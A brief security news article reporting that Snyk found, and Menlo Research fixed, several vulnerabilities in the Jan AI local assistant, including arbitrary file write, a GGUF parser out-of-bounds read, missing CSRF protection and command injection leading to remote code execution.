Jan AI, an open-source ChatGPT alternative developed by Menlo Research, has multiple vulnerabilities that expose systems to remote manipulation. These flaws, uncovered by security platform Snyk, allow unauthenticated attackers to exploit Jan AI’s lack of authentication, posing serious security risks. Jan AI, a personal assistant that operates offline, can be used on desktops and mobile devices, giving users control over AI models without relying on cloud hosting.
Snyk’s analysis revealed a critical flaw in Jan AI’s file upload function, which lacked proper sanitization. This flaw enables malicious webpages to upload arbitrary files to the system.
Further vulnerabilities were identified in Jan’s GGUF parser, and a lack of cross-site request forgery (CSRF) protection left Jan AI open to attacks on non-GET endpoints. These weaknesses allow attackers to manipulate server configurations and access or leak sensitive data by sending crafted GGUF files.
Additionally, the system’s support for Python-engine functionality exposes it to remote code execution (RCE). Attackers can inject payloads into the Python binary through model configuration updates, triggering command execution when the model starts.
These vulnerabilities are especially concerning because they could allow attackers to control or disable key server features, creating opportunities for malicious exploitation.
Menlo Research quickly responded to these findings after Snyk reported them in February 2025. By March 6, all issues were addressed and four CVEs were issued to track the flaws. The vulnerabilities included arbitrary file write, out-of-bound read, command injection, and missing CSRF protection, which were promptly fixed in the latest Jan AI update.